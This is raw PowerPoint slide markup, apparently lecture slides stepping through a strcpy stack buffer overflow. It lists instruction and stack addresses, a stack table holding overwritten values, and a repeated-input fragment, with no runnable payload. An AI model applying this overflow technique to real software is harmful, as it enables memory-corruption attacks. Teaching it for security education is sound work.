              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="359330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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1177030670"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff656</a:t>
                      </a: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355</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110923" y="138254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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052464880"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff68c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e67</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="389514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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="636771740"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff656</a:t>
                      </a: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356</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="100891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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2017687844"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff690</a:t>
                      </a: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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
